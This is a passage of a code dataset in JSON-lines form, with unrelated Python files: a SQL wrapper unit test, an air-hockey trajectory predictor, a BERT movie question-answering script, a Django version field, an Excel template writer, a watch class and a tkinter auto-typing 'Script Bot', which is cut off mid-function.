table.getRows()\nassert len(rows) == 3\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (2, True, 124, 1.23, \"abc1\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[2])\nassert rows[2] == (3, True, 125, 1.23, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\n\nprint(\"---- verify counting\")\n\ncount = table.countRows()\nassert count == 3\n\ncount = table.countRows({\n\t\"mystr\": \"abc1\"\n})\nassert count == 1\n\ncount = table.countRows({\n\t\"myint\": 0\n})\nassert count == 0\n\nprint(\"---- delete\")\n\ntable.deleteRows({\n\t\"myint\": 124\n})\n\nprint(\"---- verify the delete\")\n\nrows = table.getRows()\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (3, True, 125, 1.23, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\n\nprint(\"---- update\")\n\ntable.updateRows({\n\t\"myint\": 123456789,\n\t\"myclob\": \"Lorem ipsum dolor\",\n\t\"mybool\": False,\n\t\"myfloat\": 1.234567,\n}, {\n\t\"myint\": 125\n})\n\nprint(\"---- verify the update\")\n\nrows = table.getRows()\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (3, False, 123456789, 1.234567, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum dolor\")\n\nprint(\"---- add another column\")\n\nbSuccess = -1\ntry:\n\ttable.addColumn(DBColDef(\"myvalue\", EnumDBColType.INT32, False, EnumDBIndexType.UNIQUE_INDEX))\n\tbSuccess = 1\nexcept:\n\t# this should fail\n\tbSuccess = 0\nassert bSuccess == 0\n\ntable.addColumn(DBColDef(\"myvalue\", EnumDBColType.INT32, False, EnumDBIndexType.INDEX))\n\nprint(\"---- verify the add column operation\")\n\nrows = table.getRows()\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\", 0)\nprint(rows[1])\nassert rows[1] == (3, False, 123456789, 1.234567, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum dolor\", 0)\n\nprint(\"---- remove column\")\n\ntable.removeColumn(\"myvalue\")\n\nprint(\"---- verify the remove column operation\")\n\nrows = table.getRows()\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (1, True, 123, 1.23, \"abc0\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (3, False, 123456789, 1.234567, \"abc2\", b\"\\x00\\x01\\x02\\x03\", \"Lorem ipsum dolor\")\n\nprint(\"---- verify distinct queries\")\n\ntable.addRow({\n\t\"mybool\": True,\n\t\"myint\": 123,\n\t\"myfloat\": 1.23,\n\t\"mystr\": \"abc0\",\n\t\"myblob\": b\"\\x00\\x01\\x02\\x03\",\n\t\"myclob\": \"Lorem ipsum\",\n})\n\nrows = table.getDistinct([ \"myint\" ])\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (123,)\nprint(rows[1])\nassert rows[1] == (123456789,)\n\nrows = table.getDistinct([ \"myint\", \"mystr\", \"myclob\" ])\nassert len(rows) == 2\nprint(rows[0])\nassert rows[0] == (123, \"abc0\", \"Lorem ipsum\")\nprint(rows[1])\nassert rows[1] == (123456789, \"abc2\", \"Lorem ipsum dolor\")\n\nprint(\"--- ALL TESTS SUCCEEDED.\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jkpubsrc/python-module-jk-sql","sub_path":"tests/unit-test.py","file_name":"unit-test.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15410169266","text":"import os\nimport 
math\nimport random\n\n\ndef pointDistance(x1,y1,x2,y2):\n distance = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n return distance\n\ndef interceptVector(slope,intercept,direction):\n minY = 0\n maxY = 300\n minX = -350\n maxX = 350\n\n xLow = (minY - intercept) / slope\n xHigh = (maxY - intercept) / slope\n\n if ((slope < 0) and (direction == \"right\")):\n interceptPoint = [xLow, minY] # bottom right\n elif ((slope > 0) and (direction == \"right\")):\n interceptPoint = [xHigh, maxY] # top right\n elif ((slope < 0) and (direction == \"left\")):\n interceptPoint = [xHigh, maxY] # top left\n elif ((slope > 0) and (direction == \"left\")):\n interceptPoint = [xLow, minY] # bottom left\n\n return interceptPoint\n\n\n\n\ndef algorithm(x1,y1,x2,y2):\n\n numOfReflections = 0\n\n puckARRAY = []\n\n finalPoint = \"\"\n finalPredict = \"\"\n\n\n\n if((x2-x1) >= 0):\n direction = \"right\"\n else:\n direction = \"left\"\n\n\n #calculate distance between the two points\n distance = pointDistance(x1,y1,x2,y2)\n\n #calculate slope between the two points\n if(x2 == x1):\n slope = 0\n upDown = True\n straight = False\n elif(y2 ==y1):\n slope = 0\n straight = True\n upDown = False\n else:\n slope = (y2 - y1) / (x2 - x1)\n straight = False\n upDown = False\n\n #calulcate intercept of the line\n intercept = y2 - (slope * x2)\n\n #boundaries of the table\n minX = -350\n maxX = 350\n\n interceptPointARRAY = []\n predictedPUCK_ARRAY = []\n\n\n #if the line is not going straight up/down or left/right\n if((straight == False)and (upDown == False)):\n\n #test the point at which the line will intercept with upper or lower boundary of table\n interceptPoint = interceptVector(slope,intercept,direction)\n\n #if intercept point exceeds boundary values then there will be no reflection\n #in other words, the line is pointing towards the goal line\n if((interceptPoint[0] > maxX) or (interceptPoint[0] < minX)):\n reflect = False\n else:\n reflect = True\n\n #if there's a reflection, calculate all theoretical bounce points\n #untiul you reach the goal\n if(reflect == True):\n numOfReflections = 0\n previousX = x2\n previousY = y2\n while(reflect == True):\n\n numOfReflections += 1\n interceptPointARRAY.append(interceptPoint)\n predictedPUCK_ARRAY.append([interceptPoint[0],interceptPoint[1]])\n\n x1Predict = previousX\n y1Predict = previousY\n\n x2Predict = interceptPoint[0]\n y2Predict = interceptPoint[1]\n\n #if theoretical intercept point = (x2,y2) then you don't need to calculate the distance\n #between theoretical point and (x2,y2)\n if((x1Predict == x2Predict) and (y1Predict == y2Predict)):\n distance = math.sqrt((x2Predict - float(x1)) ** 2 + (y2Predict - float(y1)) ** 2)\n theta = math.acos(float(abs(x2Predict-float(x1)) / distance))*(180/math.pi)\n\n else:\n distance = math.sqrt((x2Predict - x1Predict) ** 2 + (y2Predict - y1Predict) ** 2)\n theta = math.acos(float(abs(x2Predict-x1Predict)/distance))*(180/math.pi)\n\n if(direction == \"right\"):\n xDir = 50\n if(slope < 0):\n yDir = 50\n else:\n yDir = -50\n elif(direction == \"left\"):\n xDir = -50\n\n if(slope < 0):\n yDir = -50\n else:\n yDir = 50\n\n\n reflectionX = x2Predict + xDir * (math.cos(math.radians(theta)))\n reflectionY = y2Predict + yDir*(math.sin(math.radians(theta)))\n\n predictedPUCK_ARRAY.append([reflectionX,reflectionY])\n\n previousX = x2Predict\n previousY = y2Predict\n\n slope = ((reflectionY - y2Predict) / (reflectionX - x2Predict))+0.001\n intercept = reflectionY - (slope * reflectionX)\n if ((reflectionX - x2Predict) >= 0):\n direction = 
\"right\"\n else:\n direction = \"left\"\n\n interceptPoint = interceptVector(slope,intercept,direction)\n\n if ((interceptPoint[0] > 350) or (interceptPoint[0] < -350)):\n reflect = False\n else:\n reflect = True\n\n if (direction == \"right\"):\n finalPoint = [maxX, slope * maxX + intercept]\n elif (direction == \"left\"):\n finalPoint = [minX, slope * minX + intercept]\n\n # draw point on graph indicating final point\n finalPredict = [finalPoint[0],finalPoint[1]]\n\n\n #if there's no reflection, calculate final point\n elif(reflect == False):\n if(direction == \"right\"):\n finalPoint = [maxX,slope*maxX + intercept]\n elif(direction == \"left\"):\n finalPoint = [minX,slope*minX + intercept]\n\n #draw point on graph indicating final point\n finalPredict = [finalPoint[0], finalPoint[1]]\n\n #calculate final point for straight line trajectory\n #this is a different case than the one above\n elif(straight == True):\n if (direction == \"right\"):\n finalPoint = [maxX, slope * maxX+ intercept]\n elif (direction == \"left\"):\n finalPoint = [minX, slope * minX + intercept]\n\n #draw point on graph indicating final point\n finalPredict = [finalPoint[0], finalPoint[1]]\n\n #remove final point and restart loop, receiving an updated position of puck\n #if(finalPredict):\n # print(\"IMPACT POINT at: {}\".format(finalPoint))\n\n\n try:\n if(numOfReflections > 1):\n return(-900,-900)\n else:\n return (finalPoint[0], finalPoint[1])\n except IndexError:\n return (-900,-900);\n\n","repo_name":"ChargerAirHockey/PIDRobot","sub_path":"PIDcode.py","file_name":"PIDcode.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"814670348","text":"import pandas as pd\nfrom nltk.stem import WordNetLemmatizer\nwordnet_lemmatizer = WordNetLemmatizer()\nfrom nltk.corpus import stopwords\nimport string\nstring.punctuation\nstop = stopwords.words('english')\nfrom nltk.stem.porter import PorterStemmer\nporter_stemmer = PorterStemmer()\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport torch\nfrom transformers import BertTokenizer, BertForQuestionAnswering\n\npd.set_option('display.max_rows', 10)\npd.set_option('display.max_columns', 10)\npd.set_option('display.width', 1000)\n\n\nmovies = pd.read_csv(\"movies_metadata.csv\", delimiter=';', encoding= \"ISO-8859-1\")\n# Removing last 40000 rows\nmovies = movies.iloc[:-40000]\n\ndef remove_punctuation(text):\n punctuationfree=\"\".join([i for i in text if i not in string.punctuation])\n return punctuationfree\n\n#storing the puntuation free text\nmovies['overview']= movies['overview'].astype(str).apply(lambda x:remove_punctuation(x))\nmovies['overview']= movies['overview'].apply(lambda x: x.lower())\nmovies['overview_without_stopwords'] = movies['overview'].apply(lambda x: ' '.join([word for word in x.split() if word not in (stop)]))\n#movies[\"token\"] = movies[\"overview_without_stopwords\"].apply(word_tokenize)\nprint(movies.head())\n\ndocs = movies['overview_without_stopwords']\n\n\ndef get_top_k_articles(query, docs, k=2):\n # Initialize a vectorizer that removes English stop words\n vectorizer = TfidfVectorizer(analyzer=\"word\", stop_words='english')\n\n # Create a corpus of query and documents and convert to TFIDF vectors\n query_and_docs = [query] + docs\n matrix = vectorizer.fit_transform(query_and_docs)\n\n # Holds our cosine similarity scores\n scores = []\n print(scores)\n\n # The first 
vector is our query text, so compute the similarity of our query against all document vectors\n for i in range(1, len(query_and_docs)):\n scores.append(cosine_similarity(matrix[0], matrix[i])[0][0])\n\n # Sort list of scores and return the top k highest scoring documents\n sorted_list = sorted(enumerate(scores), key=lambda x: x[1], reverse=True)\n top_doc_indices = [x[0] for x in sorted_list[:k]]\n top_docs = [docs[x] for x in top_doc_indices]\n\n return top_docs\n\nmodel = BertForQuestionAnswering.from_pretrained('bert-large-uncased-whole-word-masking-finetuned-squad')\ntokenizer = BertTokenizer.from_pretrained('bert-large-uncased-whole-word-masking-finetuned-squad')\n\n\ndef answer_question(question, answer_text):\n input_ids = tokenizer.encode(question, answer_text, max_length=512)\n\n # ======== Set Segment IDs ========\n # Search the input_ids for the first instance of the `[SEP]` token.\n sep_index = input_ids.index(tokenizer.sep_token_id)\n\n # The number of segment A tokens includes the [SEP] token istelf.\n num_seg_a = sep_index + 1\n\n # The remainder are segment B.\n num_seg_b = len(input_ids) - num_seg_a\n\n # Construct the list of 0s and 1s.\n segment_ids = [0] * num_seg_a + [1] * num_seg_b\n\n # There should be a segment_id for every input token.\n assert len(segment_ids) == len(input_ids)\n\n outputs = model(torch.tensor([input_ids]), # The tokens representing our input text.\n token_type_ids=torch.tensor([segment_ids]),\n # The segment IDs to differentiate question from answer_text\n return_dict=True)\n\n start_scores = outputs.start_logits\n end_scores = outputs.end_logits\n\n # ======== Reconstruct Answer ========\n # Find the tokens with the highest `start` and `end` scores.\n answer_start = torch.argmax(start_scores)\n answer_end = torch.argmax(end_scores)\n\n # Get the string versions of the input tokens.\n tokens = tokenizer.convert_ids_to_tokens(input_ids)\n\n # Start with the first token.\n answer = tokens[answer_start]\n\n # Select the remaining answer tokens and join them with whitespace.\n for i in range(answer_start + 1, answer_end + 1):\n\n # If it's a subword token, then recombine it with the previous token.\n if tokens[i][0:2] == '##':\n answer += tokens[i][2:]\n\n # Otherwise, add a space then the token.\n else:\n answer += ' ' + tokens[i]\n\n print('Answer: \"' + answer + '\"')\n\n# Enter our query here\nquery = \"Who Woody the toy?\"\n#query = \"What else does the bassist for Death From Above play?\"\n#query = \"What projects is Jesse Keeler involved in?\"\n\n# Segment our documents\n#segmented_docs = segment_documents(docs, 450)\n\n# Retrieve the top k most relevant documents to the query\ncandidate_docs = get_top_k_articles(query, docs, 3)\n\n# Return the likeliest answers from each of our top k most relevant documents in descending order\nfor i in candidate_docs:\n answer_question(query, i)\n print (\"Reference Document: \", i)\n\n","repo_name":"stickfrosch/NLP_Movies_Summary","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21279550124","text":"#11. 
Creating class of a watch\n\nclass Watch:\n #state\n def __init__(self, brand, model, price, color):\n self.brand = brand\n self.model = model\n self.price = price\n self.color = color\n\n #behaviour\n def details(self):\n print(\"Details of the watch: \", self.brand, self.model, self.price, self.color)\n\nSpecifications = Watch(\"Rolex\", \"1987 pre-owned Cosmograph Daytona 40mm\", \"Rs.2,27,11,709\", \"Yellow Gold\")\nSpecifications.details()\n","repo_name":"shettymodernchipsolutions/Python","sub_path":"_12_OOPS/Self_Notes/_03_Fields&Methods/Class/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24113502788","text":"from logging_err import Logger\nimport pandas as pd\nfrom openpyxl import load_workbook, Workbook\nimport os\nfrom fill_style import Style_pandas\nimport shutil\nfrom formating import Formating\nfrom copy import copy\nfrom openpyxl.utils import FORMULAE\n\n\nclass Excel():\n\n def __init__(self):\n self.log = Logger()\n self.log.message_debug(\"Create class Write_data\")\n self.sp = Style_pandas()\n self.fm = Formating()\n self.ido = 1\n # self.dp=Data_preparation()\n\n def CustomParser(self, data):\n import ast\n res = ast.literal_eval(data)\n print(res)\n # import json\n # n = json.dumps(data)\n # j1 = json.loads(n)\n return res\n\n def read_xlsx_load_workbook(self, path, file_name, sheet_name='Лист1'):\n wb = load_workbook(filename=os.path.join(path, file_name), read_only=True)\n ws = wb[sheet_name]\n DataFrame = pd.DataFrame()\n for row in ws.iter_rows():\n DataFrame=DataFrame.append(pd.Series([cell.value for cell in row]),ignore_index=True)\n DataFrame = pd.DataFrame(DataFrame.values[1:], columns=DataFrame.iloc[0])\n wb.close()\n return DataFrame\n\n def read_xlsx_pandas(self, path, file_name, sheet_name='Лист1'):\n\n try:\n DataFrame = pd.read_excel(os.path.join(path, file_name), sheet_name=sheet_name, engine='openpyxl',\n data_only=False)\n # DataFrame=DataFrame.replace('\\'','',regex=True)\n # DataFrame.Sum.str.upper()\n # i=DataFrame.Sum.str.replace('_', '',regex=True)\n # DataFrame=DataFrame.dropna(how='all')\n\n except Exception as e:\n self.log.message_error(e)\n return 0\n return DataFrame\n\n def create_marks(self, descript, list_mark):\n for row in descript.iter_rows(max_row=22):\n for cell in row:\n mark = str(cell.value).partition(\"~\")[2].partition(\"~\")[0]\n if mark in list_mark:\n mark_in_excel = {'startcol': cell.column, 'startrow': cell.row}\n yield mark, mark_in_excel.values()\n\n def create_xlsx(self, path='', original_file='template.xlsx', copy_file='document.xlsx'):\n shutil.copyfile(os.path.join(path, original_file),\n\n os.path.join(path, copy_file))\n main_path = os.path.join(path, copy_file)\n primary = load_workbook(main_path)\n primary.add_named_style(self.fm.template_format())\n primary.add_named_style(self.fm.template_format1())\n primary.save(main_path)\n primary.close()\n\n def add_sheet_to_xlsx(self, path='', file_name='', new_title=''):\n main_path = os.path.join(path, file_name)\n primary = load_workbook(main_path)\n ws = primary.get_sheet_by_name('ПрайсПО')\n primary.copy_worksheet(ws)\n self.ido += 1\n wss = primary.worksheets[self.ido]\n wss.title = new_title\n primary.save(main_path)\n return primary\n\n def write_to_excel(self, mv, DataFrame, path='', file_name='document.xlsx', list_columns=None, sheet=''):\n if sheet == '':\n list_sheet = dict(map(lambda ws: (ws.title, ws), mv.worksheets))\n 
else:\n list_sheet = [sheet]\n for sheet in list_sheet:\n get_descript_sheet = mv[sheet]\n tmp_startrow = 0\n for mark, (startcol, startrow) in self.create_marks(get_descript_sheet, list_columns):\n self.log.message_debug(\"Finde mark: {}\".format(mark))\n if startrow != tmp_startrow and len(DataFrame.index) > 1:\n tmp_startrow = startrow\n get_descript_sheet.insert_rows(startrow + 1, len(DataFrame))\n\n for index, row in enumerate(DataFrame.loc[:, [mark]].iterrows()):\n if type(get_descript_sheet.cell(row=startrow + index, column=startcol)).__name__ != 'MergedCell':\n cell = get_descript_sheet.cell(row=startrow, column=startcol)\n new_cell = get_descript_sheet.cell(row=startrow, column=startcol).offset(row=index, column=0)\n\n from openpyxl.formula.translate import Translator\n from openpyxl.formula import Tokenizer\n tok = Tokenizer(str(row[1][mark]))\n if tok.formula.startswith('='):\n new_cell.value = Translator(row[1][mark], origin=cell.coordinate).translate_formula(\n row_delta=startrow-2)\n else:\n new_cell.value = row[1][mark]\n\n if cell.has_style:\n new_cell.font = copy(cell.font)\n new_cell.border = copy(cell.border)\n new_cell.fill = copy(cell.fill)\n new_cell.number_format = copy(cell.number_format)\n new_cell.protection = copy(cell.protection)\n new_cell.alignment = copy(cell.alignment)\n for key, col, style in self.sp.pars_style_from_dataframe(DataFrame.iloc[index]['Format']):\n if col == mark:\n if key == 'style':\n get_descript_sheet.cell(row=startrow + index, column=startcol).style = style\n if key == 'merge_cell':\n get_descript_sheet.merge_cells(start_row=startrow + index, start_column=startcol,\n end_row=startrow + index + style[1],\n end_column=startcol + style[0])\n if key == 'hide':\n get_descript_sheet.row_dimensions[startrow + index].hidden = True\n new_cell.value = style\n\n mv.save(os.path.join(path, file_name))\n # mv.close()\n self.log.message_debug(\"Write file: {}\".format(path))\n","repo_name":"4ndriesh/calc_report","sub_path":"app/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71542542224","text":"from builtins import str\nfrom past.builtins import basestring\nfrom future.utils import python_2_unicode_compatible\n\nimport django\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\n\nfrom .constants import DEFAULT_NUMBER_BITS\nfrom .version import Version\nfrom .utils import convert_version_string_to_int, convert_version_int_to_string\nfrom . 
import forms\n\nif django.VERSION[:2] <= (1, 7):\n from django.utils.six import with_metaclass\n\n\n class BaseField(with_metaclass(models.SubfieldBase, models.BigIntegerField)):\n def to_python(self, value):\n if isinstance(value, Version):\n return int(value)\n\n if isinstance(value, basestring):\n return Version(value, self.number_bits)\n\n if value is None:\n return None\n\n return Version(convert_version_int_to_string(value, self.number_bits), self.number_bits)\nelse:\n class BaseField(models.BigIntegerField):\n def from_db_value(self, value, *args, **kwargs):\n if isinstance(value, Version):\n return int(value)\n\n if isinstance(value, basestring):\n return Version(value, self.number_bits)\n\n if value is None:\n return None\n\n return Version(convert_version_int_to_string(value, self.number_bits), self.number_bits)\n\n def to_python(self, value):\n if isinstance(value, Version):\n return int(value)\n\n if isinstance(value, basestring):\n return Version(value, self.number_bits)\n\n if value is None:\n return None\n\n return int(Version(convert_version_int_to_string(value, self.number_bits), self.number_bits))\n\n\nclass VersionField(BaseField):\n \"\"\"\n A Field where version numbers are input/output as strings (e.g. 3.0.1)\n but stored in the db as converted integers for fast indexing\n \"\"\"\n description = \"A version number (e.g. 3.0.1)\"\n\n def __init__(self, number_bits=DEFAULT_NUMBER_BITS, *args, **kwargs):\n self.number_bits = number_bits\n super(VersionField, self).__init__(*args, **kwargs)\n\n def get_prep_value(self, value):\n if isinstance(value, basestring):\n try:\n return int(Version(value, self.number_bits))\n except ValueError:\n max_value = '.'.join([str(2 ** e - 1) for e in self.number_bits])\n raise ValidationError(\"Max version is {0}\".format(max_value))\n\n if value is None:\n return None\n\n return int(value)\n\n def formfield(self, **kwargs):\n defaults = {\n 'form_class': forms.VersionField,\n 'number_bits': self.number_bits\n }\n defaults.update(kwargs)\n return super(VersionField, self).formfield(**defaults)\n\n @python_2_unicode_compatible\n def __str__(self, value):\n return str(value)\n\n\ntry:\n from south.modelsinspector import add_introspection_rules\n\n rules = [\n (\n (VersionField,),\n [],\n {\n \"number_bits\": [\"number_bits\", {\"default\": DEFAULT_NUMBER_BITS}],\n },\n )\n ]\n add_introspection_rules(rules, [\"^versionfield\"])\nexcept ImportError:\n # looks like we aren't using south\n pass\n","repo_name":"Crystalnix/django-versionfield3","sub_path":"versionfield/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"} +{"seq_id":"7081391187","text":"from random import randint\r\nimport pyautogui\r\nimport time\r\nimport tkinter as tk\r\nimport tkinter.font as tkFont\r\nfrom tkinter import ttk\r\nfrom tkinter import *\r\nimport pyperclip\r\n# import urllib.request\r\n# import urllib.parse\r\n# import re\r\nimport sys\r\n\r\n# This is an old program I worked on just for fun, and I came back to it because a friend of mine wanted it.\r\n# I scrapped some unfinished features (checking for updates, pause and resume buttons).\r\n# But I recently added word/line checkboxes to define what mod will be used.\r\n# I'll improve this project this if people seem to be interested in it.\r\n\r\nLARGE_FONT = (\"Verdana\", 12)\r\nNORM_FONT = (\"Helvetica\", 10)\r\nSMALL_FONT = (\"Helvetica\", 8)\r\n\r\n'''\r\ndef popupmsg(msg):\r\n popup 
= tk.Tk()\r\n popup.iconbitmap('icon.ico')\r\n\r\n popup.resizable(False, False)\r\n window_height = 200\r\n window_width = 400\r\n screen_width = popup.winfo_screenwidth()\r\n screen_height = popup.winfo_screenheight()\r\n x_cordinate = int((screen_width / 2) - (window_width / 2))\r\n y_cordinate = int((screen_height / 2) - (window_height / 2))\r\n popup.geometry(\"{}x{}+{}+{}\".format(window_width, window_height, x_cordinate, y_cordinate))\r\n\r\n popup.wm_title(\"YO!\")\r\n\r\n label = ttk.Label(popup, text=msg, width=50, font=LARGE_FONT, anchor=\"center\")\r\n label.place(relwidth=1, relheight=0.2, relx=0.0, rely=0.007)\r\n\r\n sub = ttk.Label(popup, text=\"Send me a message on Discord for the update!\", width=50, font=NORM_FONT,\r\n anchor=\"center\")\r\n sub.place(relwidth=1, relheight=0.2, relx=0.0, rely=0.25)\r\n\r\n B1 = ttk.Button(popup, text=\"Continue\", width=10, command=popup.destroy)\r\n B1.place(relheight=0.3, relwidth=.5, relx=0.5, rely=0.7, anchor=\"center\")\r\n\r\n popup.mainloop()\r\n'''\r\n\r\n\r\ndef thanks():\r\n popup = tk.Tk()\r\n # popup.iconbitmap('icon.ico')\r\n\r\n popup.resizable(False, False)\r\n window_height = 200\r\n window_width = 400\r\n screen_width = popup.winfo_screenwidth()\r\n screen_height = popup.winfo_screenheight()\r\n x_cordinate = int((screen_width / 2) - (window_width / 2))\r\n y_cordinate = int((screen_height / 2) - (window_height / 2))\r\n popup.geometry(\"{}x{}+{}+{}\".format(window_width, window_height, x_cordinate, y_cordinate))\r\n\r\n popup.wm_title(\"Thank you!\")\r\n\r\n label = ttk.Label(popup, text=\"App Made by CJ\", width=50, font=LARGE_FONT, anchor=\"center\")\r\n label.place(relwidth=1, relheight=0.2, relx=0.0, rely=0.007)\r\n\r\n sub = ttk.Label(popup, text=\"Thank you for using Script Bot. Have fun!\", width=50, font=NORM_FONT, anchor=\"center\")\r\n sub.place(relwidth=1, relheight=0.2, relx=0.0, rely=0.25)\r\n\r\n B1 = ttk.Button(popup, text=\"Continue\", width=10, command=popup.destroy)\r\n B1.place(relheight=0.3, relwidth=.5, relx=0.5, rely=0.7, anchor=\"center\")\r\n\r\n popup.mainloop()\r\n\r\n\r\n'''\r\nrespData = \"\"\r\n\r\ntry:\r\n url = ''\r\n headers = {}\r\n headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) ' \\\r\n 'Chrome/35.0.1916.47 Safari/537.36 '\r\n req = urllib.request.Request(url, headers=headers)\r\n resp = urllib.request.urlopen(req)\r\n respData = resp.read()\r\n\r\n saveFile = open('withHeaders.txt', 'w')\r\n saveFile.write(str(respData))\r\n saveFile.close()\r\n \r\n\r\nexcept Exception as e:\r\n a = str(e)\r\n # print(str(e))\r\n\r\nupdateCheck = re.findall(r'
(.*?)
', str(respData))\r\n\r\ntry:\r\n updateResult = updateCheck[0]\r\nexcept IndexError:\r\n updateResult = \"no updates\"\r\n'''\r\n\r\nvalue = randint(0, 10)\r\n# print(value)\r\n\r\n'''\r\nif updateResult != \"no updates\":\r\n popupmsg(updateResult)\r\nelif value == 5 or value == 9:\r\n thanks()\r\n'''\r\n\r\nif value == 5 or value == 9:\r\n thanks()\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Script Bot 1.1\")\r\n\r\nwindow_height = 600\r\nwindow_width = 600\r\nscreen_width = root.winfo_screenwidth()\r\nscreen_height = root.winfo_screenheight()\r\nx_cordinate = int((screen_width / 2) - (window_width / 2))\r\ny_cordinate = int((screen_height / 2) - (window_height / 2))\r\nroot.geometry(\"{}x{}+{}+{}\".format(window_width, window_height, x_cordinate, y_cordinate))\r\n\r\nsaveText = open(\"send.txt\", \"w\", encoding='utf-8')\r\nsaveText.writelines(\"\")\r\nsaveText.close()\r\n\r\nscriptClicked = False\r\nintervalClicked = False\r\ninterval = 0\r\n\r\nsendText = open(\"send.txt\", \"r+\", encoding='utf-8').read().split()\r\nsendText2 = open(\"send.txt\", \"r+\", encoding='utf-8').read().split(\"\\n\")\r\n\r\n\r\ndef spam_line():\r\n global exitButton\r\n exitButton[\"state\"] = \"disable\"\r\n global saveText, interval\r\n saveText = open(\"send.txt\", \"r\", encoding='utf-8')\r\n n = 1\r\n floatInterval = float(interval)\r\n for word in saveText:\r\n pyperclip.copy(word)\r\n pyautogui.hotkey(\"ctrl\", \"v\")\r\n pyautogui.press('backspace')\r\n # pyautogui.typewrite(word)\r\n pyautogui.press(\"enter\")\r\n if floatInterval.is_integer() and interval > 0:\r\n for i in range(int(interval), 0, -1):\r\n if n == len(sendText):\r\n status.configure(text=\"DONE!\")\r\n root.update()\r\n else:\r\n status.configure(text=i)\r\n root.update()\r\n time.sleep(1)\r\n elif interval < 1:\r\n status.configure(text=\"QUICK MODE\")\r\n root.update()\r\n n += 1\r\n if n > len(sendText):\r\n n = n - 1\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalEntered.insert(1.0, \"LINE COUNT: \" + str(n) + \" out of \" + str(len(sendText)))\r\n root.update()\r\n\r\n\r\ndef spam_word():\r\n global exitButton\r\n exitButton[\"state\"] = \"disable\"\r\n global saveText, interval\r\n n = 1\r\n floatInterval = float(interval)\r\n for word in sendText:\r\n pyperclip.copy(word)\r\n pyautogui.hotkey(\"ctrl\", \"v\")\r\n # pyautogui.typewrite(word)\r\n pyautogui.press(\"enter\")\r\n if floatInterval.is_integer() and interval > 0:\r\n for i in range(int(interval), 0, -1):\r\n if n == len(sendText):\r\n status.configure(text=\"DONE!\")\r\n root.update()\r\n else:\r\n status.configure(text=i)\r\n root.update()\r\n time.sleep(1)\r\n elif interval < 1:\r\n status.configure(text=\"QUICK MODE\")\r\n root.update()\r\n n += 1\r\n if n > len(sendText):\r\n n = n - 1\r\n intervalEntered.delete(1.0, \"end\")\r\n intervalEntered.insert(1.0, \"WORD COUNT: \" + str(n) + \" out of \" + str(len(sendText)))\r\n root.update()\r\n\r\n\r\ndef spam_message():\r\n text = scriptEntered.get(\"1.0\", \"end\")\r\n if text == \"Enter Your Script\\n\" or text == \"\":\r\n status.configure(text=\"Write Some Text First\")\r\n return\r\n else:\r\n root.update()\r\n global interval, saveText\r\n try:\r\n interval = intervalEntered.get(\"1.0\", \"end\")\r\n interval = float(interval)\r\n except ValueError:\r\n status.configure(text=\"Type A Number For The Interval\")\r\n return\r\n global sendText\r\n saveText = open(\"send.txt\", \"w\", encoding='utf-8')\r\n saveText.writelines(text)\r\n saveText.close()\r\n sendText = open(\"send.txt\", \"r+\", 
